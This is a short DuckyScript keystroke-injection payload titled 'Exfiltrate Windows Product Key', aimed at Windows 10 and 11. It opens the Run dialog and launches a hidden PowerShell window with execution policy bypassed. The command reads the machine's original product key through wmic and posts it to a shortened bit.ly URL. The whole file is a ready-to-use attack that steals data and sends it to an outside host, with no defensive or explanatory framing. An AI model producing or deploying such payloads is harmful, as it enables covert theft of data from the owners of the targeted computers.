REM ###################################################
REM #                                                 #
REM # Description template: Aleff (Link down)         #
REM # https://github.com/aleff-github/                #
REM # Title        : Exfiltrate Windows Product Key   #
REM # Author       : NazarHK                          #
REM # Version      : 1.0                              #
REM # Target       : Windows 10-11                    #
REM #                                                 #
REM ###################################################

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -ep bypass "$u='https://bit.ly/49SFZ7f';$k=(wmic path softwarelicensingservice get OA3xOriginalProductKey|Select-String -Pattern '\w{5}-\w{5}-\w{5}-\w{5}-\w{5}' | foreach { $_.Matches.Value })-join '';irm -Uri $u -Method Post -Body @{content=$k} | ConvertTo-Json -Depth 1
ENTER
